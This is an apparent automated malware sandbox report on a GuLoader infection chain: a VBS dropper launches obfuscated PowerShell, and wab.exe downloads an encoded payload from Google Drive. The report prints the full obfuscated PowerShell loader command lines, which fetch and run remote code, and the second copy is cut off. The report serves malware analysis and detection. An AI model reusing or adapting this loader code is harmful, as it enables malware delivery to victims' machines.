                                                                            2024-04-24 08:12:01 UTC1255INData Raw: 6e 78 36 63 31 61 6d 54 67 51 74 4b 63 44 73 44 46 36 4f 35 51 4f 32 37 54 47 2f 36 75 55 39 38 53 37 31 56 68 31 6a 75 5a 4e 4f 65 45 4b 72 79 2b 65 4c 35 55 4d 78 6f 69 61 50 79 6f 4f 35 66 74 6c 49 36 4c 34 55 6f 6f 4e 62 42 4a 4d 32 65 31 47 70 42 54 76 6e 31 52 35 39 44 6c 2b 6a 2b 51 59 2b 4a 58 4d 32 4c 4c 64 71 30 51 55 6b 30 67 65 2b 34 69 48 59 50 4f 4a 52 6f 5a 49 42 39 72 55 2f 32 46 55 61 63 7a 43 61 56 36 39 69 51 76 61 4f 47 39 46 61 57 36 56 4b 78 42 66 76 52 45 62 70 32 63 38 4b 5a 66 42 6c 51 33 53 33 32 59 6a 75 46 73 61 6f 4e 46 44 74 77 2b 6a 37 72 4c 6f 74 7a 4c 65 4d 75 61 48 6b 6b 6f 77 36 53 52 75 32 61 67 30 46 37 7a 44 31 46 7a 4d 39 6b 77 6f 37 70 55 4d 42 6b 77 6c 58 4b 6f 6c 78 4e 6c 32 34 6c 68 56 44 54 74 32 31 58 57 6b 70
                                                                            Data Ascii: nx6c1amTgQtKcDsDF6O5QO27TG/6uU98S71Vh1juZNOeEKry+eL5UMxoiaPyoO5ftlI6L4UooNbBJM2e1GpBTvn1R59Dl+j+QY+JXM2LLdq0QUk0ge+4iHYPOJRoZIB9rU/2FUaczCaV69iQvaOG9FaW6VKxBfvREbp2c8KZfBlQ3S32YjuFsaoNFDtw+j7rLotzLeMuaHkkow6SRu2ag0F7zD1FzM9kwo7pUMBkwlXKolxNl24lhVDTt21XWkp
                                                                            2024-04-24 08:12:01 UTC1255INData Raw: 6e 31 31 5a 50 34 79 52 47 4e 49 46 48 77 30 6c 74 58 31 61 4d 47 4e 4c 6b 72 38 67 46 4b 6c 45 62 5a 31 5a 4d 4b 50 6b 63 39 49 45 6e 49 65 52 67 72 31 5a 50 62 50 31 79 6a 49 46 45 48 69 2b 54 57 41 2f 77 6f 58 56 31 2f 50 44 36 66 47 71 51 6b 53 62 6f 74 6c 78 63 46 51 51 59 56 44 57 71 56 48 32 43 52 6a 58 36 59 39 4d 65 4b 41 4a 4d 6a 54 6e 43 50 64 53 47 6d 31 6d 71 6d 4d 78 70 2b 4a 38 44 2b 76 31 62 63 58 4f 69 6b 37 77 63 2b 73 6a 2b 5a 63 67 38 7a 4b 69 64 46 59 71 47 36 57 31 43 4c 76 56 52 67 6f 62 70 55 59 4b 47 36 56 47 43 68 75 6c 52 67 6f 62 70 55 59 4b 47 36 56 47 43 68 75 6c 52 67 6f 62 70 55 43 72 2f 51 4a 56 70 68 7a 48 5a 75 6e 4d 7a 45 47 6a 74 46 77 66 69 68 75 6c 51 78 47 4c 44 36 70 57 41 37 76 65 55 70 61 72 72 68 59 48 43 38 61
                                                                            Data Ascii: n11ZP4yRGNIFHw0ltX1aMGNLkr8gFKlEbZ1ZMKPkc9IEnIeRgr1ZPbP1yjIFEHi+TWA/woXV1/PD6fGqQkSbotlxcFQQYVDWqVH2CRjX6Y9MeKAJMjTnCPdSGm1mqmMxp+J8D+v1bcXOik7wc+sj+Zcg8zKidFYqG6W1CLvVRgobpUYKG6VGChulRgobpUYKG6VGChulRgobpUCr/QJVphzHZunMzEGjtFwfihulQxGLD6pWA7veUparrhYHC8a


Session ID: 2
Source IP: 192.168.2.4
Source Port: 49737
Destination IP: 142.251.2.101
Destination Port: 443
PID: 5440
Process: C:\Program Files (x86)\Windows Mail\wab.exe

Timestamp: 2024-04-24 08:12:27 UTC, Bytes transferred: 216, Direction: OUT
GET /uc?export=download&id=1RpbgeefCbfe4fi32TLrpBFNby3_b7V9N HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: drive.google.com
Cache-Control: no-cache

Timestamp: 2024-04-24 08:12:28 UTC, Bytes transferred: 1582, Direction: IN
HTTP/1.1 303 See Other
Content-Type: application/binary
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Wed, 24 Apr 2024 08:12:27 GMT
Location: https://drive.usercontent.google.com/download?id=1RpbgeefCbfe4fi32TLrpBFNby3_b7V9N&export=download
Strict-Transport-Security: max-age=31536000
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Content-Security-Policy: script-src 'nonce-30M_gjkuX7DjOoycIIsOUg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
Cross-Origin-Opener-Policy: same-origin
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close


Session ID: 3
Source IP: 192.168.2.4
Source Port: 49738
Destination IP: 142.251.2.132
Destination Port: 443
PID: 5440
Process: C:\Program Files (x86)\Windows Mail\wab.exe

Timestamp: 2024-04-24 08:12:28 UTC, Bytes transferred: 258, Direction: OUT
GET /download?id=1RpbgeefCbfe4fi32TLrpBFNby3_b7V9N&export=download HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Cache-Control: no-cache
Host: drive.usercontent.google.com
Connection: Keep-Alive

Timestamp: 2024-04-24 08:12:29 UTC, Bytes transferred: 4746, Direction: IN
HTTP/1.1 200 OK
X-GUploader-UploadID: ABPtcPpN6gkaG6j_jUnYQ36YIQnJi3vkVHUksuUU22yFD2_wmXrXGrkGAY4-DpUO5Hg8ehTku88
Content-Type: application/octet-stream
Content-Security-Policy: sandbox
Content-Security-Policy: default-src 'none'
Content-Security-Policy: frame-ancestors 'none'
X-Content-Security-Policy: sandbox
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Resource-Policy: same-site
X-Content-Type-Options: nosniff
Content-Disposition: attachment; filename="LPHiQUz214.bin"
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: false
Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Android-Cert, X-Goog-Maps-Ios-Uuid, X-Goog-Maps-Android-Uuid, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context, x-goog-nest-jwt
Access-Control-Allow-Methods: GET,HEAD,OPTIONS
Accept-Ranges: bytes
Content-Length: 244800
Last-Modified: Wed, 24 Apr 2024 00:55:57 GMT
Date: Wed, 24 Apr 2024 08:12:29 GMT
Expires: Wed, 24 Apr 2024 08:12:29 GMT
Cache-Control: private, max-age=0
X-Goog-Hash: crc32c=hrj4Xw==
Server: UploadServer
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close



                                                                            Target ID:0
                                                                            Start time:10:11:55
                                                                            Start date:24/04/2024
                                                                            Path:C:\Windows\System32\wscript.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Umulighed.vbs"
                                                                            Imagebase:0x7ff7ea7a0000
                                                                            File size:170'496 bytes
                                                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:1
                                                                            Start time:10:11:55
                                                                            Start date:24/04/2024
                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Unbumped = 1;$Svveflyvers='Substrin';$Svveflyvers+='g';Function Disken($Sthamrenes){$Hotelvrelserne=$Sthamrenes.Length-$Unbumped;For($Acned=5; $Acned -lt $Hotelvrelserne; $Acned+=(6)){$Professorships+=$Sthamrenes.$Svveflyvers.Invoke($Acned, $Unbumped);}$Professorships;}function Jots($Misagent){& ($Jargonens) ($Misagent);}$Orthoarsenite=Disken 'DyrenM.agisoFornozSpasmi GammlcompllJordsaInt,a/ Proa5Gaest.Anu y0slibr ,ters(UnderWTulwaiLyshanFa eldIndsyoStrmpw SnebsC.lam IndtNGu.naT Tabu Balan1Docum0Cowsh. Obl,0Reap.; Ti.l XorinWcataciFusi,nRoya 6Bijug4Cr.ck;Efter ReaffxBalsa6 va,b4.arco;Efter ,andlr Sek.vMilit: nint1fremk2Beiji1Bl,nk.Uncre0 Hard) Albr A,tneG Ga.se Sl.dc s.inkUndero argo/Kazat2Banka0Outs,1impra0Reson0Unapp1Bille0Pikke1eleme RveskF MothiTjenerUnma,ePriapfK.emto AnpaxActiv/Ufo,d1 iru2Pizzl1Tetra.A,opt0Coun ';$Orlops=Disken 'ClaudUPhrensIndhaeDrejerFolk.-Ru,drA CarpgHkasse Unwan relatSuffu ';$Horrify=Disken 'R,nsehEspaltInodot.ranopRent.sFe.ie:,rage/ Kast/SemicdOpfrsrTel,diFlydevHazieeSpeck.Nickeg dtro Bndso DriegHansilAs.emeTradu..asshcBdet.oUnpramPilus/Le.oruSpinncNon.i? 
FilieFyrsvxSpellpCam.soFragmrTilbatSocia=AttacdPouncoBjergwDekorn.nterlUgekooTalmsaGastrdc,pry&justiiVolumdL,tsv=Uds,y1 CyliuI.rigj istoh IndilSogneMLnninuprveu_ lakuBriksYUncon5MangejAmtsr0 Ga.etTropiuLathevHackeHRail,XO,phasOologbSkovtNMesse0 JohnGInsemftvivl5 BespxAntiacbidraC,untsLOestrQSc.mmuMayorn Ze.eFRacem ';$Cachinnate=Disken 'swine> Kumy ';$Jargonens=Disken 'Unp.uiCo.tre D.ngx aggr ';$Pessimistisk='Blanketten';Jots (Disken 'PredrSInfuse Pr,ntSalgs-Co tiCDiffeoIntelnPaa lt Stboe envanKlaphtKva m Tilbr-RedobPOp,avaUn,xptChlorh urr Er gsTForsl:Homet\ ImpaBKlag,a ContdFlet.nKr,gsiOverdnAfrungUni.ie IsoprDesia.ActustDuplixudstytTiltu Ly.u-FirehVMidshaFl,kel.kspouBortkeEmbry Noto$ ResuPUnblieEp,stsNoncosmven iGarewmIlldiiDra,ts artitPedomiSm lss HypokPe,fe;Folke ');Jots (Disken 'VacatiBekenf Stin Inhal( Lym tOenoleAplodsGonertU.end-Noy npEata.a,ngentKommuhChart JuicT Rigs:tokom\C.uriB JenkaInfardNobilnFor.oiFininnAabengAffa eClairr Nonr.Age.tt til,x,iktotUnbla)Ova o{Hundee nstmxFor oi onant ,xsa}Aand.;Tr,ld ');$Monotonises = Disken 'MadoleBuzzwcPlaceh TromoSmede Affil% otaaCurcip Chrop Bre,dBestta sidetPrincaLegwo%,anke\DyppeKKvg.elAfkoraVoldspCotanj KrisaUnloqgSparetH,alpeProc.rkeesdsErita.DatapSDisple Radap Er,v Thomi& Linj&forko Al.neFalusc HydrhChilioDetru Exone$Rekur ';Jots (Disken ' icho$Al rmgSalgsl EklioKonnibSelfsaAfs.alDe.om:FrnvnSC ianyFac.dnStubbk Le tr alumoIs.denForhisMi levbromomBeboen HngsiChefknPseudgForsms Menu=Fr ki(CatticSkabnmSierrdVr.ma .rusk/Outstc Laic Virtu$,roxiMSt,afo pocn uryoSjleat Scylo Fi.knAgurkiFibersTresaeA.tifsC cre)Mes.n ');Jots (Disken 'Sleke$SkrkpgQuatel,koleoHairmbTrotta AllulKulka: emorpSemitaDogslrUnthraOpfrsdUnderruforroBaadepTiptap,isfoiBemusn HebdgUd ad=Refam$ FreuHFjendo NewlrVinker BasliDdbolfI.oniyChesi. 
ChrosStuckpMetc,lBrn.oi AnortSomew(Re,br$savanCS.egeaRe.lucArgumhVit eiBastan.lassnBegreaIndurtOp.aveA gra)Sko.e ');$Horrify=$paradropping[0];Jots (Disken 'Hud m$UnodogIndkrlclarsoEddiebCalviaBetonl,lane: SkabP O.taoDgnbulGsbovuSubs.p.earlhSk.ull DeseoPensiiventis GrodbInteroBenc i NonmoKantntUdpumiOutracFyres=LevneNSageseUnsigwPrev -Nek.aOYezgabRealijForsveotorhc ameytSkj e ladSMo tayNonimsFolket S,uleSrkenm Sati.NonreN Antie nvent Pali.IsotoWLdrepe PermbSevenCPalmilHjer iDisape illanSpunstPlugg ');Jots (Disken '.ypos$mi.ilPPanteoRiedelDole uGenerp RefuhCaballUndreoIrreliUnsimsSh,oubhaando Dollitorv.oTrotst CariiYu,escPigta. ugsHporkleHorsta TomodSe aseAmuserunlegsRepro[Gnide$Cey oOFasherBispelvide oforespTritusMorda]Rh zo=Etude$ HavoOUnbacr Vovet LiquhForvao,ipoga.nvinrDriftsU.ganeT ivinNulpuiPlayftJeanieTryne ');$cognitional=Disken 'MinimPG.asfoTr,pulIncoru H.pop UnobhTirzalschooo Hampi eurisT angbSm,aroVi,iliTitleoGry.ttPr.cei St.tcAandf. InfoDOpe.aoRffelwSrprgn Phlol NaggoSvingaUxorid ShriFbagiui.empelUnd reSubs (Optog$B.rbaHAnspno I dgrPartirSemiciBjrgbfAddabyunder,Udgan$ForsiTAdumbamar,emTerzea ScalrSentiiWinl.ncrispd Pu.isOestr1 A.ts1 Wals6Frnd.) 
Rust ';$cognitional=$Synkronsvmnings[1]+$cognitional;$Tamarinds116=$Synkronsvmnings[0];Jots (Disken ' ,idi$Detecg erenlVikinoE strbJulusaHstpalPib n:MelamR ArchaSovevds,ckeiVeloko kl.us Fug iSuppogdslernteledaSkraelSysteematrarIndl,sAfsky=Sprac( Ko.mTSpasmeLejevs.ostptSter.-PoculP LuggaRebsltMislah Ress Attra$FrenuT ,nisaAmob,mAksela FradrAff.iiDelegnEn obd Udlas Supe1,yper1Centr6Uns r)Du ll ');while (!$Radiosignalers) {Jots (Disken 'hova $S.inkgElectlBunkeo BrowbVarooaLarynlSnitm:A apeLValraeAnalynFeltndTeknoaSamleb DandlkappeeProla=Letal$ IntotKle krSymfou Cal,eUddel ') ;Jots $cognitional;Jots (Disken 'VintrSSkoletOpkbeaHoughrEkspotCotra-dia.oS Un,elCiseleTilste Aal.p Rend Wali4Overt ');Jots (Disken 'Rekap$DunlegCoadvlReh do BnkhbB,trya Un el.torm:InkosR akaoaTheridApostiCratioUnerosB seji Lse gDyscrnTradua,arumlUnikueBags rKlam.sGesjf=Nonre(Ekv.pTOvenfes,kyss Leopttrykv-Bero.PKrigsa RvestAdvarhFlytt estl$ScripTNonsea,ragtmOwleraHyp rr Mor.i DissnFor.idSk ifs Turi1Stra 1Befol6Uforb)Iniss ') ;Jots (Disken 'Temat$Tilb gPen,olReba.oUneteb NondaDamaslTilre:KlasspFi.uroNominrSlipbt .ndsrTilbrt LogatRecolePretar FrateSp.acrPewee= Post$Over gLu url.mhtto SclebKaktua Hegul Joen:ElektDArgumiSeks,fLiparf Pe,cu charsExt at.uple+Titu,+Brobu%Mine $Foll pSt,olaManeurGa,mmaE docd Tranr.rangoAscocpBe,idp Tel.iHastenresprgSkovm.UnocccvenenoBurkluP.cisnhurrytSt.lk ') ;$Horrify=$paradropping[$portrtterer];}Jots (Disken '.mili$pro.rgsaniklUdtolo nfanbLacquaInddmlKolos: rgaMPressaLsepug Satae Wirir MakraEsk,d1 Udkl1Admin6uncov mache=Grami OverlGI soleboto.t apul- ankeCOve,loEndaon,gnaatThirse,lydinBetegtExplo Si i$ overTLnmodaS eepmOversaNicobrTa,shi AnginStilfdvamsescribb1 Ant.1Sylfe6 Fl,r ');Jots (Disken 'G.lde$Forthg,errelLedeto LipibClaspanoncol,roli:NoninPVognprGleadeMargucIhndeoMultinBothrjForm eUnmodcSta dtPro.euRetnir.andhi Lea,nForcogSugep Svag.=Agraf J.ggl[ D ceS p.odyNolossDuffet Bes e isjomPrewe. 
OperCKldeboAfstenRestavEksemeCorner saurtH men]Ste b:Whett:forfrFBevaerskarnoUdf dmPneumB OrdraH.emtsBaldeeNovel6Elefa4 RapsSKlve,tM.wsarLang iS,ortnCrystgGene.(Smer $TidssM DentaReducgSqu.re NederValfaaBo,ge1.ropo1Veste6 Rejs)Terfe ');Jots (Disken 'Carbo$.eepiggan ilKost oTripobHet raMttetl t,le:Trea.rPassaeOvergbRibbeoBi liuL.vemnSal,ed SobbiTeoren.ammegSk.smnFernaeTvrdrsToldasDo bl Crimb=Manip Affal[ScottSBusteyFulvosrejsetSieseeKabelmSpdbr.BurstT ChokeProgrx Skjotita.i.Br.vbEKoordnvrdilcSlagsopelmadT.knii Ke,nnA.oidgUnimm]Under: Rena:JynxgASemitSSki,dCPashaI LivsI ouch.InputG ,romeFrko tNuzzlS B uit,anatrRestoi Kllen KotegS,erm(Cilio$ Ud oPanasar .vede.ewatcWeedio Am tnSn,bojDioxaeZarenc Bantt gennuForlorElectiD agln PostgToti,)Misav ');Jots (Disken ' Jasm$ForsggDandrlBet.yoRecanbUdgr,aSalutlRural:selskjRefera H.wfmWittebTeh so abrirTopfoeGalletPer mtNedereBelt.nCuber= Lykk$HospirConsueOvertbKedeloDuperuU.salnAadredUdmaniNonadnK.ntogFilmfnTashie SupesSc.nesDissi.NonilsRoseeuUdklabMonchs Sig.tTrinnrWhi.eiPulchnvraisgKunde( Mall3Trimo4Blrek7 tor0Wra p6Telet7Trans,Fo tr2 Boks8go.eb6reapp7opfin3M jor)irri, ');Jots $jamboretten;"
                                                                            Imagebase:0x7ff788560000
                                                                            File size:452'608 bytes
                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000001.00000002.2261833973.00000221E3C09000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:2
                                                                            Start time:10:11:55
                                                                            Start date:24/04/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff7699e0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:3
                                                                            Start time:10:11:57
                                                                            Start date:24/04/2024
                                                                            Path:C:\Windows\System32\cmd.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Klapjagters.Sep && echo $"
                                                                            Imagebase:0x7ff639ed0000
                                                                            File size:289'792 bytes
                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:4
                                                                            Start time:10:12:05
                                                                            Start date:24/04/2024
                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Unbumped = 1;$Svveflyvers='Substrin';$Svveflyvers+='g';Function Disken($Sthamrenes){$Hotelvrelserne=$Sthamrenes.Length-$Unbumped;For($Acned=5; $Acned -lt $Hotelvrelserne; $Acned+=(6)){$Professorships+=$Sthamrenes.$Svveflyvers.Invoke($Acned, $Unbumped);}$Professorships;}function Jots($Misagent){& ($Jargonens) ($Misagent);}$Orthoarsenite=Disken 'DyrenM.agisoFornozSpasmi GammlcompllJordsaInt,a/ Proa5Gaest.Anu y0slibr ,ters(UnderWTulwaiLyshanFa eldIndsyoStrmpw SnebsC.lam IndtNGu.naT Tabu Balan1Docum0Cowsh. Obl,0Reap.; Ti.l XorinWcataciFusi,nRoya 6Bijug4Cr.ck;Efter ReaffxBalsa6 va,b4.arco;Efter ,andlr Sek.vMilit: nint1fremk2Beiji1Bl,nk.Uncre0 Hard) Albr A,tneG Ga.se Sl.dc s.inkUndero argo/Kazat2Banka0Outs,1impra0Reson0Unapp1Bille0Pikke1eleme RveskF MothiTjenerUnma,ePriapfK.emto AnpaxActiv/Ufo,d1 iru2Pizzl1Tetra.A,opt0Coun ';$Orlops=Disken 'ClaudUPhrensIndhaeDrejerFolk.-Ru,drA CarpgHkasse Unwan relatSuffu ';$Horrify=Disken 'R,nsehEspaltInodot.ranopRent.sFe.ie:,rage/ Kast/SemicdOpfrsrTel,diFlydevHazieeSpeck.Nickeg dtro Bndso DriegHansilAs.emeTradu..asshcBdet.oUnpramPilus/Le.oruSpinncNon.i? 
FilieFyrsvxSpellpCam.soFragmrTilbatSocia=AttacdPouncoBjergwDekorn.nterlUgekooTalmsaGastrdc,pry&justiiVolumdL,tsv=Uds,y1 CyliuI.rigj istoh IndilSogneMLnninuprveu_ lakuBriksYUncon5MangejAmtsr0 Ga.etTropiuLathevHackeHRail,XO,phasOologbSkovtNMesse0 JohnGInsemftvivl5 BespxAntiacbidraC,untsLOestrQSc.mmuMayorn Ze.eFRacem ';$Cachinnate=Disken 'swine> Kumy ';$Jargonens=Disken 'Unp.uiCo.tre D.ngx aggr ';$Pessimistisk='Blanketten';Jots (Disken 'PredrSInfuse Pr,ntSalgs-Co tiCDiffeoIntelnPaa lt Stboe envanKlaphtKva m Tilbr-RedobPOp,avaUn,xptChlorh urr Er gsTForsl:Homet\ ImpaBKlag,a ContdFlet.nKr,gsiOverdnAfrungUni.ie IsoprDesia.ActustDuplixudstytTiltu Ly.u-FirehVMidshaFl,kel.kspouBortkeEmbry Noto$ ResuPUnblieEp,stsNoncosmven iGarewmIlldiiDra,ts artitPedomiSm lss HypokPe,fe;Folke ');Jots (Disken 'VacatiBekenf Stin Inhal( Lym tOenoleAplodsGonertU.end-Noy npEata.a,ngentKommuhChart JuicT Rigs:tokom\C.uriB JenkaInfardNobilnFor.oiFininnAabengAffa eClairr Nonr.Age.tt til,x,iktotUnbla)Ova o{Hundee nstmxFor oi onant ,xsa}Aand.;Tr,ld ');$Monotonises = Disken 'MadoleBuzzwcPlaceh TromoSmede Affil% otaaCurcip Chrop Bre,dBestta sidetPrincaLegwo%,anke\DyppeKKvg.elAfkoraVoldspCotanj KrisaUnloqgSparetH,alpeProc.rkeesdsErita.DatapSDisple Radap Er,v Thomi& Linj&forko Al.neFalusc HydrhChilioDetru Exone$Rekur ';Jots (Disken ' icho$Al rmgSalgsl EklioKonnibSelfsaAfs.alDe.om:FrnvnSC ianyFac.dnStubbk Le tr alumoIs.denForhisMi levbromomBeboen HngsiChefknPseudgForsms Menu=Fr ki(CatticSkabnmSierrdVr.ma .rusk/Outstc Laic Virtu$,roxiMSt,afo pocn uryoSjleat Scylo Fi.knAgurkiFibersTresaeA.tifsC cre)Mes.n ');Jots (Disken 'Sleke$SkrkpgQuatel,koleoHairmbTrotta AllulKulka: emorpSemitaDogslrUnthraOpfrsdUnderruforroBaadepTiptap,isfoiBemusn HebdgUd ad=Refam$ FreuHFjendo NewlrVinker BasliDdbolfI.oniyChesi. 
ChrosStuckpMetc,lBrn.oi AnortSomew(Re,br$savanCS.egeaRe.lucArgumhVit eiBastan.lassnBegreaIndurtOp.aveA gra)Sko.e ');$Horrify=$paradropping[0];Jots (Disken 'Hud m$UnodogIndkrlclarsoEddiebCalviaBetonl,lane: SkabP O.taoDgnbulGsbovuSubs.p.earlhSk.ull DeseoPensiiventis GrodbInteroBenc i NonmoKantntUdpumiOutracFyres=LevneNSageseUnsigwPrev -Nek.aOYezgabRealijForsveotorhc ameytSkj e ladSMo tayNonimsFolket S,uleSrkenm Sati.NonreN Antie nvent Pali.IsotoWLdrepe PermbSevenCPalmilHjer iDisape illanSpunstPlugg ');Jots (Disken '.ypos$mi.ilPPanteoRiedelDole uGenerp RefuhCaballUndreoIrreliUnsimsSh,oubhaando Dollitorv.oTrotst CariiYu,escPigta. ugsHporkleHorsta TomodSe aseAmuserunlegsRepro[Gnide$Cey oOFasherBispelvide oforespTritusMorda]Rh zo=Etude$ HavoOUnbacr Vovet LiquhForvao,ipoga.nvinrDriftsU.ganeT ivinNulpuiPlayftJeanieTryne ');$cognitional=Disken 'MinimPG.asfoTr,pulIncoru H.pop UnobhTirzalschooo Hampi eurisT angbSm,aroVi,iliTitleoGry.ttPr.cei St.tcAandf. InfoDOpe.aoRffelwSrprgn Phlol NaggoSvingaUxorid ShriFbagiui.empelUnd reSubs (Optog$B.rbaHAnspno I dgrPartirSemiciBjrgbfAddabyunder,Udgan$ForsiTAdumbamar,emTerzea ScalrSentiiWinl.ncrispd Pu.isOestr1 A.ts1 Wals6Frnd.) 
